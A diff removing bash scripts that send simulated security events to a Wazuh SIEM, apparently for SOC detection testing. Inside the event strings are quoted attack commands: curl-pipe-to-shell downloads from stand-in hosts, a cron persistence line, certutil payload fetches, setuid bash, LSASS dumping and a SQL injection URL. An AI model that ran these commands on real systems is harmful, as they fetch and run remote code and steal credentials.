-  while true; do
-    send_once
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    send_once
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-fi

scripts/send-wazuh-endpoint-agent-test-events.sh

@@ -1,228 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-PLATFORM="${1:-all}"      # windows | mac | linux | all
-SCENARIO="${2:-all}"      # auth | process | persistence | privilege | malware | all
-COUNT="1"
-DELAY="0.3"
-FOREVER="false"
-DRY_RUN="${DRY_RUN:-0}"
-COUNT_SET="false"
-DELAY_SET="false"
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-
-WIN_HOST="${WIN_HOST:-win-client-01}"
-MAC_HOST="${MAC_HOST:-mac-client-01}"
-LINUX_HOST="${LINUX_HOST:-linux-client-01}"
-SIM_USER="${SIM_USER:-jane.doe}"
-
-shift 2 || true
-
-while (($#)); do
-  case "$1" in
-    --forever)
-      FOREVER="true"
-      shift
-      ;;
-    *)
-      if [[ "${COUNT_SET}" == "false" ]]; then
-        COUNT="$1"
-        COUNT_SET="true"
-      elif [[ "${DELAY_SET}" == "false" ]]; then
-        DELAY="$1"
-        DELAY_SET="true"
-      else
-        echo "error: unexpected argument '$1'"
-        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
-        exit 1
-      fi
-      shift
-      ;;
-  esac
-done
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric (example: 0.5)"
-  exit 1
-fi
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if [[ "${DRY_RUN}" == "1" ]]; then
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
-    return 0
-  fi
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    return 1
-  fi
-
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-rand_public_ip() {
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
-    echo "198.51.100.$((RANDOM % 240 + 10))"
-  else
-    echo "203.0.113.$((RANDOM % 240 + 10))"
-  fi
-}
-
-rand_private_ip() {
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
-}
-
-send_windows_auth() {
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
-}
-
-send_windows_process() {
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
-}
-
-send_windows_persistence() {
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
-}
-
-send_windows_privilege() {
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
-}
-
-send_windows_malware() {
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
-}
-
-send_mac_auth() {
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
-}
-
-send_mac_process() {
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
-}
-
-send_mac_persistence() {
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
-}
-
-send_mac_privilege() {
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
-}
-
-send_mac_malware() {
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
-}
-
-send_linux_auth() {
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
-}
-
-send_linux_process() {
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
-}
-
-send_linux_persistence() {
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
-}
-
-send_linux_privilege() {
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
-}
-
-send_linux_malware() {
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
-}
-
-send_one_platform() {
-  local p="$1"
-  case "${SCENARIO}" in
-    auth)
-      "send_${p}_auth"
-      ;;
-    process)
-      "send_${p}_process"
-      ;;
-    persistence)
-      "send_${p}_persistence"
-      ;;
-    privilege)
-      "send_${p}_privilege"
-      ;;
-    malware)
-      "send_${p}_malware"
-      ;;
-    all)
-      "send_${p}_auth"
-      "send_${p}_process"
-      "send_${p}_persistence"
-      "send_${p}_privilege"
-      "send_${p}_malware"
-      ;;
-    *)
-      echo "error: unknown scenario '${SCENARIO}'"
-      echo "valid: auth | process | persistence | privilege | malware | all"
-      exit 1
-      ;;
-  esac
-}
-
-send_once() {
-  case "${PLATFORM}" in
-    windows)
-      send_one_platform "windows"
-      ;;
-    mac|macos)
-      send_one_platform "mac"
-      ;;
-    linux)
-      send_one_platform "linux"
-      ;;
-    all)
-      send_one_platform "windows"
-      send_one_platform "mac"
-      send_one_platform "linux"
-      ;;
-    *)
-      echo "error: unknown platform '${PLATFORM}'"
-      echo "valid: windows | mac | linux | all"
-      exit 1
-      ;;
-  esac
-}
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
-  while true; do
-    send_once
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    send_once
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-fi

scripts/send-wazuh-proposal-appendix-b-events.sh

@@ -1,230 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-# Usage:
-#   scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
-#
-# selector:
-#   all | b1 | b2 | b3 | <usecase_id>
-#   example usecase_id: B1-01, B2-01, B3-06
-
-SELECTOR="${1:-all}"
-COUNT="${2:-1}"
-DELAY="${3:-0.3}"
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
-DRY_RUN="${DRY_RUN:-0}"
-FOREVER="false"
-PROFILE="${PROFILE:-simulation}"
-
-for arg in "${@:4}"; do
-  case "${arg}" in
-    --forever)
-      FOREVER="true"
-      ;;
-    --profile=*)
-      PROFILE="${arg#*=}"
-      ;;
-    *)
-      echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
-      exit 1
-      ;;
-  esac
-done
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-
-VCENTER_HOST="${VCENTER_HOST:-vcenter-01}"
-ESXI_HOST="${ESXI_HOST:-esxi-01}"
-LOGMON_HOST="${LOGMON_HOST:-logmon-01}"
-WIN_SYSMON_HOST="${WIN_SYSMON_HOST:-win-sysmon-01}"
-SIM_USER="${SIM_USER:-jane.doe}"
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric"
-  exit 1
-fi
-
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: EVENT_DELAY must be numeric"
-  exit 1
-fi
-
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
-  echo "error: profile must be simulation or production"
-  exit 1
-fi
-
-rand_public_ip() {
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
-    echo "198.51.100.$((RANDOM % 240 + 10))"
-  else
-    echo "203.0.113.$((RANDOM % 240 + 10))"
-  fi
-}
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if [[ "${DRY_RUN}" == "1" ]]; then
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
-    return 0
-  fi
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    return 1
-  fi
-
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-selector_matches() {
-  local id="$1"
-  local section="$2"
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-  local idl
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
-  local sec
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
-
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
-}
-
-emit_b_usecase() {
-  local id="$1"
-  local section="$2"
-  local severity="$3"
-  local source="$4"
-  local host="$5"
-  local usecase="$6"
-  local body="$7"
-
-  selector_matches "${id}" "${section}" || return 0
-
-  local tags
-  if [[ "${PROFILE}" == "production" ]]; then
-    tags="soc_mvp_test=true source=${source} severity=${severity}"
-  else
-    tags="soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
-  fi
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} ${tags} ${body}"
-  sleep "${EVENT_DELAY}"
-}
-
-emit_b1() {
-  local sip
-  sip="$(rand_public_ip)"
-
-  emit_b_usecase "B1-01" "B1" "high" "vmware" "${VCENTER_HOST}" \
-    "vCenter GUI Login Failed 5 Times and Success 1 Time" \
-    "event_type=vmware_vcenter_login_fail_success login_fail_count=5 login_success_count=1 user=\"${SIM_USER}\" src_ip=${sip}"
-
-  emit_b_usecase "B1-02" "B1" "medium" "vmware" "${ESXI_HOST}" \
-    "ESXi Enable SSH on Hosts" \
-    "event_type=vmware_esxi_enable_ssh action=enable service=ssh user=\"root\" host=\"${ESXI_HOST}\""
-
-  emit_b_usecase "B1-03" "B1" "high" "vmware" "${ESXI_HOST}" \
-    "ESXi SSH Failed 5 Times and Success 1 Time" \
-    "event_type=vmware_esxi_ssh_fail_success ssh_fail_count=5 ssh_success_count=1 user=\"root\" src_ip=${sip}"
-}
-
-emit_b2() {
-  emit_b_usecase "B2-01" "B2" "low" "log_monitor" "${LOGMON_HOST}" \
-    "Log Monitor Logs Loss Detection" \
-    "event_type=log_loss_detection missing_stream=firewall expected_eps=500 observed_eps=0 duration_seconds=180"
-}
-
-emit_b3() {
-  emit_b_usecase "B3-01" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon LSASS Dumping" \
-    "event_type=sysmon_lsass_dump event_id=10 process=procdump.exe target_process=lsass.exe user=\"${SIM_USER}\""
-
-  emit_b_usecase "B3-02" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon SQL Injection" \
-    "event_type=sysmon_sql_injection event_id=1 process=w3wp.exe url=\"/app/login.php?id=1%27%20OR%201=1--\""
-
-  emit_b_usecase "B3-03" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon Webshell" \
-    "event_type=sysmon_webshell event_id=11 file=\"C:\\\\inetpub\\\\wwwroot\\\\shell.aspx\" process=w3wp.exe"
-
-  emit_b_usecase "B3-04" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon Uninstall" \
-    "event_type=sysmon_security_agent_uninstall event_id=1 process=msiexec.exe cmdline=\"msiexec /x security-agent\" user=\"${SIM_USER}\""
-
-  emit_b_usecase "B3-05" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon LSASS Dumping by Task Manager" \
-    "event_type=sysmon_lsass_dump_taskmgr event_id=10 process=taskmgr.exe target_process=lsass.exe action=create_dump"
-
-  emit_b_usecase "B3-06" "B3" "medium" "windows_sysmon" "${WIN_SYSMON_HOST}" \
-    "Sysmon CertUtil Download" \
-    "event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\""
-}
-
-emit_selected_set() {
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-
-  case "${sel}" in
-    all)
-      emit_b1
-      emit_b2
-      emit_b3
-      ;;
-    b1|b1-*)
-      emit_b1
-      ;;
-    b2|b2-*)
-      emit_b2
-      ;;
-    b3|b3-*)
-      emit_b3
-      ;;
-    *)
-      emit_b1
-      emit_b2
-      emit_b3
-      ;;
-  esac
-}
-
-echo "starting proposal Appendix B log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
-  while true; do
-    emit_selected_set
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    emit_selected_set
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-  echo "done"
-fi

scripts/send-wazuh-proposal-appendix-c-events.sh

@@ -1,235 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-# Usage:
-#   scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]
-#
-# selector:
-#   all | c1 | c2 | c3 | <usecase_id>
-#   example usecase_id: C1-01, C2-03, C3-04
-
-SELECTOR="${1:-all}"
-COUNT="${2:-1}"
-DELAY="${3:-0.3}"
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
-DRY_RUN="${DRY_RUN:-0}"
-FOREVER="false"
-
-for arg in "${@:4}"; do
-  case "${arg}" in
-    --forever)
-      FOREVER="true"
-      ;;
-    *)
-      echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]"
-      exit 1
-      ;;
-  esac
-done
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-VPN_HOST="${VPN_HOST:-fgt-vpn-01}"
-WIN_HOST="${WIN_HOST:-win-ad-01}"
-SIM_USER="${SIM_USER:-alice.admin}"
-SIM_SERVICE_USER="${SIM_SERVICE_USER:-svc_backup}"
-SIM_SRC_IP="${SIM_SRC_IP:-203.0.113.44}"
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric"
-  exit 1
-fi
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if [[ "${DRY_RUN}" == "1" ]]; then
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
-    return 0
-  fi
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    return 1
-  fi
-
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-selector_matches() {
-  local id="$1"
-  local section="$2"
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-  local idl
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
-  local sec
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
-}
-
-emit_c_usecase() {
-  local id="$1"
-  local section="$2"
-  local severity="$3"
-  local host="$4"
-  local usecase="$5"
-  local body="$6"
-
-  selector_matches "${id}" "${section}" || return 0
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
-  sleep "${EVENT_DELAY}"
-}
-
-emit_c1() {
-  # Two successful logins by same user with impossible travel profile
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
-    "Impossible Travel Detection" \
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=203.150.10.10 country=TH src_lat=13.7563 src_lon=100.5018 dst_host=vpn-gw-01"
-
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
-    "Impossible Travel Detection" \
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01"
-}
-
-emit_c2() {
-  emit_c_usecase "C2-01" "C2" "high" "${WIN_HOST}" \
-    "Privileged Account Usage Outside Business Hours" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=${SIM_SRC_IP} logon_type=10 dst_host=dc-01"
-
-  emit_c_usecase "C2-02" "C2" "medium" "${WIN_HOST}" \
-    "Dormant Account Activation" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"legacy.user\" src_ip=198.51.100.55 dst_host=dc-01"
-
-  emit_c_usecase "C2-03" "C2" "high" "${WIN_HOST}" \
-    "Service Account Interactive Logon" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"${SIM_SERVICE_USER}\" account_type=service is_service=true logon_type=10 src_ip=198.51.100.66 dst_host=filesrv-01"
-
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
-    "Rapid Privilege Escalation then Sensitive Access" \
-    "event_type=windows_privilege_group_add event_id=4732 user=\"${SIM_USER}\" action=group_add is_admin=true src_ip=10.10.1.20 dst_host=dc-01"
-
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
-    "Rapid Privilege Escalation then Sensitive Access" \
-    "event_type=windows_file_share_access event_id=5145 user=\"${SIM_USER}\" action=share_access src_ip=10.10.1.20 dst_host=filesrv-02 dst_port=445"
-}
-
-emit_c3() {
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
-    "Multiple Authentication Success Across Hosts" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-01 dst_port=3389"
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
-    "Multiple Authentication Success Across Hosts" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-02 dst_port=3389"
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
-    "Multiple Authentication Success Across Hosts" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-01 dst_port=3389"
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
-    "Multiple Authentication Success Across Hosts" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-02 dst_port=3389"
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
-    "Multiple Authentication Success Across Hosts" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=fs-01 dst_port=3389"
-
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
-    "SMB/RDP Lateral Burst Pattern" \
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-01 dst_port=3389"
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
-    "SMB/RDP Lateral Burst Pattern" \
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-01 dst_port=445"
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
-    "SMB/RDP Lateral Burst Pattern" \
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-02 dst_port=445"
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
-    "SMB/RDP Lateral Burst Pattern" \
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-02 dst_port=3389"
-
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
-    "Admin Accessing Many Servers Rapidly" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-01 dst_port=3389"
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
-    "Admin Accessing Many Servers Rapidly" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-02 dst_port=3389"
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
-    "Admin Accessing Many Servers Rapidly" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-03 dst_port=3389"
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
-    "Admin Accessing Many Servers Rapidly" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-04 dst_port=3389"
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
-    "Admin Accessing Many Servers Rapidly" \
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-05 dst_port=3389"
-
-  # C3-04 scanning behavior: many destination ports from same source
-  for port in 80 88 135 139 389 443 445 464 636 1025 1433 1521 2049 2375 3306 3389 5432 5985 8080 8443; do
-    emit_c_usecase "C3-04" "C3" "medium" "${WIN_HOST}" \
-      "Internal Scanning Enumeration Behavior" \
-      "event_type=internal_scan src_ip=10.30.0.40 dst_host=10.30.10.$((RANDOM % 10 + 1)) dst_port=${port} action=connect_attempt"
-  done
-}
-
-emit_selected_set() {
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-  case "${sel}" in
-    all)
-      emit_c1
-      emit_c2
-      emit_c3
-      ;;
-    c1|c1-*)
-      emit_c1
-      ;;
-    c2|c2-*)
-      emit_c2
-      ;;
-    c3|c3-*)
-      emit_c3
-      ;;
-    *)
-      emit_c1
-      emit_c2
-      emit_c3
-      ;;
-  esac
-}
-
-echo "starting proposal Appendix C log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
-  while true; do
-    emit_selected_set
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    emit_selected_set
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-  echo "done"
-fi

scripts/send-wazuh-proposal-required-events.sh

@@ -1,356 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-# Usage:
-#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
-#
-# selector:
-#   all | a1 | a2 | a3 | a4 | <usecase_id>
-#   example usecase_id: A2-01, A3-05, A4-24
-
-SELECTOR="${1:-all}"
-COUNT="${2:-1}"
-DELAY="${3:-0.3}"
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
-DRY_RUN="${DRY_RUN:-0}"
-FOREVER="false"
-PROFILE="${PROFILE:-simulation}"
-
-for arg in "${@:4}"; do
-  case "${arg}" in
-    --forever)
-      FOREVER="true"
-      ;;
-    --profile=*)
-      PROFILE="${arg#*=}"
-      ;;
-    *)
-      echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
-      exit 1
-      ;;
-  esac
-done
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-
-FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
-FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
-WIN_HOST="${WIN_HOST:-win-dc01}"
-DNS_HOST="${DNS_HOST:-dns-fw-01}"
